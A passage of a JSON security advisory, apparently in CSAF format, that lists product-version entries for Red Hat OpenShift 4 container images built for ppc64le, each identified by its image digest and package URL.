"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"product_id": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/container-networking-plugins-microshift-rhel9@sha256%3A47c2783399e696c5e9c87ba45a653580d79f0ff9da2452c6bddc78c504a593be?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847815"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-coredns-rhel9@sha256%3Ab407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846419"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-attacher-rhel9@sha256%3A052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848396"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9@sha256%3Abb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847459"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-manila-rhel9-operator@sha256%3A5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846328"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3Abf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847385"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-snapshot-metadata-rhel9@sha256%3A6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-livenessprobe-rhel9@sha256%3A8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846717"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-node-driver-registrar-rhel9@sha256%3Ac90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847281"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-external-provisioner-rhel9@sha256%3A34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847115"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A874f7948285d470527af2f674fc82981f2c2b375ab056e06710d4b63f467db08?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773707627"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"product_id": "registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:a9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/egress-router-cni-rhel9@sha256%3Aa9600a1e30aff273ea62fac0e0b765c5aa74f41c3a770740fe7a6bd104d845c0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848446"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-gcp-workload-identity-federation-webhook-rhel9@sha256%3Af882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-proxy-rhel9@sha256%3A4740f94bbe328edec319a168d5c4b35ec7c51ad5f0160a6cb0c450da99868ac1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-alertmanager-rhel9@sha256%3A1304433ac42f7966801fc7adb9bab2cb85db100c27299f0817a60436a57118c5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-node-exporter-rhel9@sha256%3A3d3258d77f4829041e29a9dea806a0041237646e65ad3c3007d7cd98ec15bfdc?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849423"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:ab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9@sha256%3Aab067ec0877565544332595cf9d023f4ad3479d940a8f3cb4f1eaf3f930d9e0f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848133"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3A4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849362"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A40b00fab8ba7620d9ad8884b9609046aa8e08647f4832d60a0b5168adf3cfffa?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773848743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:ff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-rbac-proxy-rhel9@sha256%3Aff584bede1ee71be248b0f2070dee6ea3b78050e88b88682c28fc797ac660623?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849626"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-state-metrics-rhel9@sha256%3A922f2719d99173cc43cc0c575706dfdf0b18d04fbbebfa361f3b8da58c00a5ec?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847270"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:d11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3Ad11bece814725c67d10c4b050c11785a13bcd98115847b96e6ee984290dcd113?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849009"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A57adf23fcec07626794be373afc7d776b9e384c23cfb53592cc1913b2b9bed00?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849532"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-rhel9@sha256%3Ab3c5ce783d27d939251680683bdce181cb07a1163f34b4296a6f5612cd2c94a1?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:d2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-cni-microshift-rhel9@sha256%3Ad2d0365a92e1bf0b4875cdfee71046eabf1086f0a4abfb76766742da0867b643?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849379"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-multus-networkpolicy-rhel9@sha256%3A0c0229e3ec73dd145493230412174b1454f0dd723bf9ae25286ef32f1042060e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773847787"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-networking-console-plugin-rhel9@sha256%3A9692d0a74e2a1e5112b0afe712b3ac4b8a84a62a652eb74a0c282b5db6bf6340?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849485"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:cf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-oauth-server-rhel9@sha256%3Acf1f2538d8092d2de077e2a5f4ad37e73b59b1f25918ffbae586f20f2f2f1364?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849032"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:e4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3Ae4c9cd54f5209f2b1d5b53ded3d40292253c74f8ae3d4db626756ddbc6e11c60?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773846953"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3A7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773844600"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cli-rhel9@sha256%3A73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849329"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3Afdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849670"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3A1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773849553"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-deployer-rhel9@sha256%3Abfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-haproxy-router-rhel9@sha256%3A015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773850450"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
